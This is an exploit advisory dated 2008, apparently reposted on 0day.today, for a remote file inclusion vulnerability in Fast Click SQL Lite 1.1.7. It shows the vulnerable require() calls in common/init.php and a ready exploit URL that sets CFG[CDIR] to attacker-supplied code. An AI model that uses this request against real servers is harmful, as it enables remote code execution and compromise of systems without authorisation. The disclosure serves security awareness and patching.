id: 3918
date: 10/18/2008
title: Fast Click SQL 1.1.7 Lite (init.php) Remote File Inclusion Vulnerability
author: NoGe
cves: 

========================================================================
Fast Click SQL 1.1.7 Lite (init.php) Remote File Inclusion Vulnerability
========================================================================


===========================================================================================


  [o] Fast CLick SQL Lite 1.1.7 Remote File Inclusion Vulnerability

       Software : Fast CLick SQL Lite version 1.1.7
       Vendor   : http://www.ftrsoft.com/
       Download : http://www.ftrsoft.com/downloads.html
       Author   : NoGe


===========================================================================================


  [o] Vulnerable file

       common/init.php

	require($CFG['CDIR'].'/global.php'); 
	require($CFG['CDIR'].'/sql.php');



  [o] Exploit

       http://localhost/[path]/common/init.php?CFG[CDIR]=[evilcode]


===========================================================================================




#  0day.today [2023-03-24]  #